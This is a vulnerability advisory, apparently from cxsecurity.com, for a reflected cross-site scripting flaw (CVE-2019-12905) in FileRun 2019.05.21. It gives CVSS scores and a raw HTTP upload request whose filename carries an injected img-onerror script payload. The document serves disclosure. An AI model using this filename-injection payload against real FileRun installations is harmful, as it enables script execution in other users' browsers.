FileRun 2019.05.21 Reflected Cross-Site Scripting

2020.06.22
Credit: Emre ÖVÜNÇ
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: FileRun 2019.05.21 - Reflected Cross-Site Scripting # Date: 2019-07-01 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://www.filerun.com/ # Software Link: https://filerun.com/download # Version: v2019.05.21 # Tested on: Windows/Linux # CVE: CVE-2019-12905 # CVE-2019-12905 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12905 # https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3 # PoC To exploit vulnerability, someone could upload an allowed file named “><img src=x onerror=prompt(document.domain)> to impact users who open the page. POST /filerun/?module=fileman&section=do&page=up HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://172.16.191.129/filerun/ Content-Type: multipart/form-data; boundary=---------------------------142096305821079611661465592403 Content-Length: 6034 DNT: 1 Connection: close Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowTotalSize" 5100 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowIsFirstChunk" 1 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowIsLastChunk" 1 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowFilename" â��><img src=x onerror=prompt(document.domain)>.jpg -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="path" /ROOT/HOME -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="file"; filename="â��><img src=x onerror=prompt(document.domain)>.jpg" Content-Type: image/jpg <%@ I said you should learn! %> -----------------------------142096305821079611661465592403--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top